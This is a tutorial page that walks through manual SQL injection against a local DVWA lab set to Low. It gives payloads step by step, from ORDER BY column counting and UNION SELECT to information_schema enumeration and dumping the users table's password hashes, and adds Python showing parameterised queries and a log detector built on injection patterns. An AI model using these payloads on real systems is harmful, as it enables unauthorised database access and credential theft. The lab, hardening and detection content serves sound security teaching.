The four strokes of "11 strokes to cyber security": Low-level DVWA SQL injection

Source: Internet
Author: User
Tags: sql injection, wrapper, docker ps

Taking DVWA as an example, this manual injection walkthrough helps readers understand the principles and the process of SQL injection.

1. Start Docker and execute the following commands in the terminal (list all containers, start the DVWA container, then confirm it is running):

    docker ps -a

    docker start LOCALDVWA

    docker ps

The execution results are shown in Figure 4-19.

Figure 4-19 Starting DVWA

2. Enter 127.0.0.1 in the browser address bar; the browser opens the DVWA page (DVWA was set up in the previous chapters). Click DVWA Security in the left column and set the difficulty to Low. Then click SQL Injection in the left column to open the SQL injection page, as shown in Figure 4-20.

Figure 4-20 DVWA SQL injection

3. Following the prompt, fill in the User ID text box (enter 1) and click the Submit button. The result is shown in Figure 4-21.

Figure 4-21 DVWA returned data

4. Two fields are returned: First name and Surname. Let's look at how the server handles the user-submitted data. Click the View Source button in the lower-right corner of the page, as shown in Figure 4-22.

Figure 4-22 Low level SQL injection code

You can see that the server performs no processing at all on the id entered by the user; the value is placed directly into the SQL statement. Manual injection therefore proceeds in three stages: first determine how many database fields the page uses, then determine the position in which each field is displayed, and finally construct an SQL statement at one of those field positions and inject it.
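To show why the probes in the following steps behave as they do, here is an added example that is not DVWA's own code: a Python handler that pastes the raw id into the query exactly as the low-level source does, beside a hardened version that validates the id and binds it as a parameter. An in-memory SQLite table with constructed rows stands in for DVWA's MySQL users table, so the SQL comment marker is SQLite's -- rather than MySQL's #; the function names and sample data are assumptions for this illustration.

```python
import sqlite3

# Constructed sample data standing in for DVWA's users table (not the page's own data).
SAMPLE_USERS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db():
    """Create an in-memory SQLite database with a small users table.

    SQLite stands in for the MySQL/MariaDB backend; the injection mechanism is
    the same, only the comment marker differs ('--' here, '#' on the page).
    """
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)"
    )
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror the low-level handler: the raw id becomes part of the query text.

    Returns the result rows, or the error text when the database rejects the query
    (which is exactly the signal the ORDER BY column-count probe relies on).
    """
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    try:
        return conn.execute(query).fetchall()
    except sqlite3.Error as exc:
        return f"error: {exc}"


def lookup_hardened(conn, user_id):
    """Hardened handler: check the type, then bind the id as a query parameter.

    The database receives the id as data, never as SQL text, so the input cannot
    change the statement's shape, column count, or add a UNION.
    """
    if not str(user_id).isdigit():
        return []  # reject anything that is not a plain integer id
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (int(user_id),)).fetchall()


def demo():
    """Run the page's probes through both handlers; returns {name: (vulnerable, hardened)}."""
    conn = make_db()
    probes = {
        "normal": "1",
        "order_by_2": "1' ORDER BY 2-- ",     # step 5: column count matches, page loads normally
        "order_by_3": "1' ORDER BY 3-- ",     # steps 6-7: one column too many, database error
        "union_1_2": "1' UNION SELECT 1,2-- ",  # step 7: shows where each column is displayed
    }
    return {
        name: (lookup_vulnerable(conn, payload), lookup_hardened(conn, payload))
        for name, payload in probes.items()
    }


if __name__ == "__main__":
    for name, (vulnerable, hardened) in demo().items():
        print(f"{name:11s} vulnerable={vulnerable!r} hardened={hardened!r}")
```

The hardened variant returns an empty result for every probe because the whole payload is compared as a value against user_id; the vulnerable variant reproduces the page's observations (normal page for ORDER BY 2, an error for ORDER BY 3, an extra row for the UNION).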

5. First determine the number of fields used: enter 1' ORDER BY 2# in the text box. The server now receives the data as $query = "SELECT first_name, last_name FROM users WHERE user_id = '1' ORDER BY 2#'". The constructions that follow all work the same way: what you type is the back half of a legitimate SQL statement, which is appended to the server's own SQL statement. Click the Submit button to get the result shown in Figure 4-23.

Figure 4-23 Testing database field 1

6. The page returns normally, indicating that at least two fields are referenced. (Because the page submits data with the GET method, you can also construct the SQL statement in the address bar to inject; note, however, that spaces and semicolons are converted to their percent-encoded ASCII form there.) Continue by entering 1' ORDER BY 3# in the text box and clicking the Submit button to get the result shown in Figure 4-24.

Figure 4-24 Testing database field 2

7. The page no longer returns normally, indicating that the page uses fewer than 3 database fields. Combined with the previous test, you can conclude that the page refers to 2 fields in the database. The next step is to find where each referenced field is displayed. Enter 1' UNION SELECT 1,2# in the text box and click the Submit button. The result is shown in Figure 4-25.

Figure 4-25 Testing field position

As you can see, the first field is displayed after First name and the second field after Surname. You can now build your own SQL statements for the injection. There are currently 2 positions that can be injected; either can be chosen, and here the second position is used. Enter 1' UNION SELECT 1,version()# in the text box, which returns the database version, as shown in Figure 4-26.

Figure 4-26 Returning the database version

8. Enter 1' UNION SELECT database(),2# in the text box. This time the first field position is injected, and the database name is returned, as shown in Figure 4-27.

Figure 4-27 Returning the database name

9. Knowing the database name, you can query the tables table of MySQL's information_schema database to list all tables in the dvwa database. Enter 1' UNION SELECT 1,GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema='dvwa'# in the text box; all tables in the dvwa database are returned, as shown in Figure 4-28.

Figure 4-28 Returning the tables in the database

10. The dvwa database contains the tables guestbook and users; what we need here is the contents of the users table. First get the fields of the users table. Enter 1' UNION SELECT 1,GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name='user'# in the text box; the fields of the users table are returned, as shown in Figure 4-29.

Figure 4-29 Returning the table fields

11. Many fields are returned: Host, User, Password, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv, Show_db_priv, Super_priv, Create_tmp_table_priv, Lock_tables_priv, Execute_priv, Repl_slave_priv, Repl_client_priv, Create_view_priv, Show_view_priv, Create_routine_priv, Alter_routine_priv, Create_user_priv, Event_priv, Trigger_priv, Create_tablespace_priv, ssl_type, ssl_cipher, x509_issuer, x509_subject, max_questions, max_updates, max_connections, max_user_connections, plugin, authentication_string, password_expired, is_role, default_role, max_statement_time. In fact, the users table in the dvwa database does not have this many fields; the extra ones are fields of the users table in another MariaDB database. The next task is to separate out the fields that belong to the users table in the dvwa database. Enter 1' AND EXISTS(SELECT host FROM users)# in the text box to test whether the host field belongs to the users table. The result is shown in Figure 4-30.

Figure 4-30 Testing the host field

12. An error message is returned, indicating that host is not a field of the users table in the dvwa database. Continue with the user field: enter 1' AND EXISTS(SELECT user FROM users)# in the text box. The result is shown in Figure 4-31.

Figure 4-31 Testing the user field

13. The page returns normally, so user is a field of the users table in the dvwa database. Continue testing the remaining fields in the same way. Finally, we obtain all the fields of the users table in the dvwa database: user_id, first_name, last_name, user, password, avatar, last_login, failed_login.

14. All fields of the users table in the dvwa database are now known, and the data in the table can be retrieved. Enter 1' UNION SELECT 1,GROUP_CONCAT(user_id,first_name,last_name,password,avatar,last_login,failed_login) FROM users# in the text box; the result is shown in Figure 4-32.

Figure 4-32 Getting table data

If you need to work with other tables, repeat the steps in this order.
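Every step above is submitted with GET, so the probes end up percent-encoded in the web server's access log. The following added example (not part of the original page) is a small Python detector that parses Apache-style request lines, URL-decodes each query parameter and flags the patterns the walkthrough uses: ORDER BY column-count probes, UNION SELECT, information_schema lookups, GROUP_CONCAT, AND EXISTS probes, and a quote closed off by an SQL comment. The log lines, the /sqli/ path, the client addresses and the assumption that the id parameter must be an integer are all constructed for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not from the page). The /sqli/ path and the
# client addresses are placeholders; the id values are the URL-encoded form of the probes
# walked through above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/?id=1&Submit=Submit HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /sqli/?id=1%27+ORDER+by+3%23&Submit=Submit HTTP/1.1" 200 480
10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "GET /sqli/?id=1%27+union+select+1%2Cversion%28%29+%23&Submit=Submit HTTP/1.1" 200 530
10.0.0.5 - - [01/Jan/2024:10:00:31 +0000] "GET /sqli/?id=1%27+UNION+SELECT+1%2CGROUP_CONCAT%28table_name%29+from+information_schema.tables+where+table_schema%3D%27dvwa%27+%23&Submit=Submit HTTP/1.1" 200 560
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /sqli/?id=2&Submit=Submit HTTP/1.1" 200 515
10.0.0.9 - - [01/Jan/2024:10:01:40 +0000] "GET /sqli/?id=1%27+and+exists%28select+user+from+users%29+%23&Submit=Submit HTTP/1.1" 200 512
"""

# Common/combined log format: client, identd, user, [time], "METHOD target protocol", status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Parameters the application defines as integers (assumption made for this example).
NUMERIC_PARAMS = {"id"}

# Each rule is (label, pattern) applied to the URL-decoded parameter value.
RULES = [
    ("column-count probe (ORDER BY n)", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("UNION SELECT", re.compile(r"\bunion\b(\s+all)?\s+select\b", re.I)),
    ("information_schema lookup", re.compile(r"\binformation_schema\.", re.I)),
    ("GROUP_CONCAT aggregation", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("boolean EXISTS probe", re.compile(r"\b(and|or)\s+exists\s*\(", re.I)),
    # A quote that is never closed, with the rest of the statement commented out.
    ("quote closed by SQL comment", re.compile(r"'[^']*(#|--|/\*)\s*$")),
]


def inspect_value(param, value):
    """Return the list of rule labels that fire on one decoded parameter value."""
    reasons = [label for label, pattern in RULES if pattern.search(value)]
    if param in NUMERIC_PARAMS and not value.isdigit():
        reasons.append("non-numeric value in integer parameter")
    return reasons


def analyse_log(text):
    """Scan access-log text; return one alert dict per suspicious (line, parameter) pair."""
    alerts = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        query = urlsplit(m["target"]).query
        # parse_qs percent-decodes the values and maps '+' back to a space.
        for param, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                reasons = inspect_value(param, value)
                if reasons:
                    alerts.append({"line": lineno, "client": m["client"],
                                   "param": param, "value": value, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for a in analyse_log(SAMPLE_LOG):
        print(f"line {a['line']} {a['client']} {a['param']}={a['value']!r}: "
              f"{', '.join(a['reasons'])}")
```

The two legitimate requests (id=1 and id=2) produce no alert; each of the four probe requests is flagged on the id parameter, with the type check on the integer parameter catching every one of them even before any keyword rule fires.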

If you are interested, you are welcome to read the book "11 Tricks to Play Network Security: With Python, More Secure".
